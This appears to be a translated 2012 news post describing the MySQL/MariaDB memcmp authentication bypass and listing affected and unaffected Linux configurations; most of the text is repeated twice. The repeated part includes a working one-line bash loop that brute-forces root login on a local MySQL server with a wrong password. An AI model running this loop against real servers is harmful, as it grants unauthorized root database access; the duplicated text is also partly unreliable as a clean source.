June 11, 2012 at 12:17Funny vulnerability in MySQL under Linux 64-bit
On Saturday, MariaDB project security coordinator Sergei Golubchik ( petropavel ) announced an interesting vulnerability in MySQL / MariaDB up to versions 5.1.61, 5.2.11, 5.3.5, 5.5.22.
The bottom line is that when a MariaDB / MySQL user connects, a token (SHA from password and hash) is calculated, which is compared with the expected value. In this case, the memcmp () function should return a value in the range -128..127, but on some platforms (it seems like glibc on Linux with SSE optimization), the return value may fall outside the range.
As a result, in 1 case out of 256, the hash comparison procedure with the expected value always returns true, regardless of the hash. In other words, the system is vulnerable to a random password with a probability of 1/256.
As a result, a simple bash command gives the attacker root access to the vulnerable MySQL server, even if he does not know the password.
Currently, the vulnerability is unofficially confirmed in the following configurations:
Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
Debian Linux 64-bit (it is not yet clear in which specific versions)
Arch Linux (the same)
Fedora 16 (64-bit)
Users also report configurations in which the vulnerability does not seem to be observed:
Official MySQL and MariaDB builds (including Windows)
Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably all)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0 + squeeze1
Debian Linux squeeze 64-bit 5.1.61-0 + squeeze1
There is no exact list of vulnerable and invulnerable systems.
Joshua Drake of the company Accuvant Labs published a program to check for vulnerabilities.
The bottom line is that when a MariaDB / MySQL user connects, a token (SHA from password and hash) is calculated, which is compared with the expected value. In this case, the memcmp () function should return a value in the range -128..127, but on some platforms (it seems like glibc on Linux with SSE optimization), the return value may fall outside the range.
As a result, in 1 case out of 256, the hash comparison procedure with the expected value always returns true, regardless of the hash. In other words, the system is vulnerable to a random password with a probability of 1/256.
As a result, a simple bash command gives the attacker root access to the vulnerable MySQL server, even if he does not know the password.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>Currently, the vulnerability is unofficially confirmed in the following configurations:
Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
Debian Linux 64-bit (it is not yet clear in which specific versions)
Arch Linux (the same)
Fedora 16 (64-bit)
Users also report configurations in which the vulnerability does not seem to be observed:
Official MySQL and MariaDB builds (including Windows)
Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably all)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0 + squeeze1
Debian Linux squeeze 64-bit 5.1.61-0 + squeeze1
There is no exact list of vulnerable and invulnerable systems.
Joshua Drake of the company Accuvant Labs published a program to check for vulnerabilities.